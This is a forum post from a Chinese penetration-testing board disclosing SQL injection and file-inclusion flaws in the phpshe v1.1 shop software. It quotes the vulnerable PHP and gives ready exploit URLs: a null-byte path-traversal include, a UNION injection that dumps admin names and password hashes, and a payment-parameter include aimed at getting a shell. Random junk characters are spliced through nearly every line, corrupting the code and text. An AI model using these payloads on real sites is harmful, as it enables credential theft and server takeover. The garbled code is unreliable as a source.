找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
返回列表 发新帖
查看: 2949|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
/*******************************************************/! I$ A+ j8 M' w$ O, G
/* Phpshe v1.1 Vulnerability
4 h$ V' O' Q  ?; O; V  ]- c/* ========================
. V  H7 y$ @- ^/ \; P, j( c' o/* By: : Kn1f3
. O9 K! l6 }2 N3 @$ P2 ~/* E-Mail : 681796@qq.com* Z8 M; v& Y, }6 G0 k0 M: P2 s" ~0 L
/*******************************************************// C! @3 `4 F6 j4 X/ U
0×00 整体大概参数传输
" m+ L: z5 Y4 B# R+ _
1 I: s2 [2 {; @( r( S1 E8 E2 R; q& _6 W5 B1 O/ j2 ?0 C

7 O+ C3 [4 T  V) K//common.php2 q; t# ~* ?' I+ S
if (get_magic_quotes_gpc()) {" B% z6 v5 @/ T, Q+ M8 C
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
* j0 l. u' @) G5 U# C!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
- V( j+ ~2 n$ ]8 R3 Z9 i, D# \}
7 ?/ C4 ]6 b. H* g' v- J0 g7 ~; }else {
/ W1 X: M, [/ c3 m* o0 U/ B# F!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');. O0 H. `' d& v2 O; ^
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
0 x- n( y3 i+ C2 B( o6 N}% p+ V0 l# O! p! {3 F+ U0 x$ U; n
session_start();
& s& T  M1 y8 H# s2 q!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');) z+ G& f' E  G# p* s+ q) g
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
% p- S. y# E& O$ o5 X, h& s' N: F
/ G0 \7 {" y. t% m0×01 包含漏洞* M8 k1 G* h1 v% a

3 o% H6 K# S) V& L8 l8 o& D, _; h; D; G/ C. d  ~$ S% i- N% J
//首页文件
' s2 C0 T8 A- R8 o5 L0 k! D<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);" ^0 K, j+ u( v# y/ x" R- L
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
3 n. v( P( G1 j4 qpe_result();4 a, w* [/ [5 J* _4 A" w8 d
?>1 Z! o8 P5 n" w$ d/ m) a! j; ^
//common 文件 第15行开始
7 }) [' ]1 f1 h9 @: gurl路由配置6 b1 _+ w% l$ s! v, u) e( ]
$module = $mod = $act = 'index';
1 `/ r* I' V/ R$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
- l" J4 P! t. P: ]3 I$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
- L5 z, _5 ~, u9 ?9 B. d$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
' P1 ~5 j8 \4 ~& `- B; u//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%009 ]; b2 h% n5 Y

, W; E9 j9 S3 U* }# C
7 W4 f9 A. E1 {) u
0×02 搜索注入# |- @4 Z, F2 [/ w  b: x( |7 T' J# E
$ V) l1 q* `+ D" X9 q$ T5 S
<code id="code2">

//product.php文件) V* ~5 {! F8 ?7 f& K
case 'list':/ m4 B& T( l: J/ h. X6 w
$category_id = intval($id);; L/ d6 w) g/ i' i. @
$info = $db->pe_select('category', array('category_id'=>$category_id));
- }( \9 F2 a! z& t//搜索
8 f1 g  _# f$ D  M# o1 r$sqlwhere = " and `product_state` = 1";% Z, @( X) [/ @9 y9 z: I; S- E" G
pe_lead('hook/category.hook.php');
$ F9 m4 L; F. y% M) B) Xif ($category_id) {4 u: a; r! K2 R  B1 ~  h
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";8 a, x& K+ ]! Y6 N! }9 P
}. P/ `# |; S5 p7 ^$ v1 d
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
4 u( U  G& b% c& |5 B5 |5 q/ ~. Eif ($_g_orderby) {6 ?" O* p4 e3 e6 o$ A6 j+ w3 v
$orderby = explode('_', $_g_orderby);: {/ \5 R3 D6 G# c( E/ u# i3 J
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
) Y. |# f$ @' g8 y$ q/ S% Y}
9 _! _& Q7 y! P7 v$ u& [else {
. S4 j2 z. v6 a( a$sqlwhere .= " order by `product_id` desc";8 M7 f: Q3 X" b. m! s
}) _: C+ h1 O- O$ z. K0 c. V
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
4 R* e3 F- i- W+ L1 G3 h) p, d6 o//热卖排行
7 f+ Q, \& l1 k$ o$product_hotlist = product_hotlist();5 b. f. B) }8 j: M# A
//当前路径
+ C6 s* [! g4 u1 G$nowpath = category_path($category_id);
1 j3 W$ K9 y: D0 l$seo = pe_seo($info['category_name']);
# E. x  R" i( Y! z) @- b  i7 m8 [include(pe_tpl('product_list.html'));
; {5 Y  P+ `: O+ z//跟进selectall函数库
  N- ^7 a5 T# h7 [' Spublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())8 X  h4 X8 g3 K$ d/ i$ d
{
' V" S1 {) p" L3 f4 M//处理条件语句3 O* R- C: u( I
$sqlwhere = $this->_dowhere($where);5 ^8 x; {9 I( v5 _
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);6 w& W, L  w' [/ z
}* O7 |2 F( ], A
//exp
% b& g1 N4 \. _product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
1 S$ B- |$ L" I& T3 ~$ L

</code>: ]: ~! g& W8 T6 e/ V5 Z) W
' z/ L) T' U5 r* z, C) O3 }
0×03 包含漏洞2
5 I1 N, k4 p* l/ S3 n. L, a
1 M7 _9 i% n) @. r/ X( Z* z. s! N<code id="code3">

//order.php

case 'pay':


/ e/ t  Z1 N% F) s4 ^6 ?  I% |$order_id = pe_dbhold($_g_id);

' W: _0 w  J" E/ t2 c1 d0 E
$cache_payway = cache::get('payway');

+ ]* u/ U% u4 `/ ~
foreach($cache_payway as $k => $v) {


0 T: E( n. X( e% ^1 T# B$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


4 P2 e+ y2 S: O* F$ Rif ($k == 'bank') {

5 _3 ^5 H$ O0 K& {4 f! r: j9 S
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


! k( _+ R* {" N}


% d$ L8 Y1 c- K$ S}

- q: K; w3 W& c4 G
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

% Q8 Q4 \5 g: O) ^
!$order['order_id'] && pe_error('订单号错误...');


6 I* h: a3 E9 A  c8 c; Z  s) X( sif (isset($_p_pesubmit)) {

$ x% Y( T" B1 c
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


2 f7 E5 A6 a/ b# K& z8 G+ z$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

0 U4 E) G0 G/ [! p
foreach ($info_list as $v) {

& ]8 \/ x4 o" Y$ V4 W3 h* p7 H
$order['order_name'] .= "{$v['product_name']};";
4 l* i; A, j+ s8 G( w% r3 D3 e8 E


7 J7 b& ^9 B; m+ m}

/ a- i/ ]. \$ _
echo '正在为您连接支付网站,请稍后...';


8 f; l( e, N' Qinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


  c3 X# {% ]* J7 b6 Y7 Q1 F}//当一切准备好的时候就可以进行"鸡肋包含了"


3 h$ W& n/ L% K& Y+ V* n2 selse {


6 ~( H; U) L& Y* C( Mpe_error('支付错误...');


6 f* z& U1 _' z4 `7 L3 P. B}


7 u$ s& s# R! K7 X/ \' P}


% C& u  m8 \4 N7 W3 B& \. Q6 i$seo = pe_seo('选择支付方式');


9 v. ^2 R' U4 `( X9 tinclude(pe_tpl('order_pay.html'));

% ?5 }; K+ ^' ?- W% \. [( V5 Y
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
+ S: n# b" {* [6 n( V% ahttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表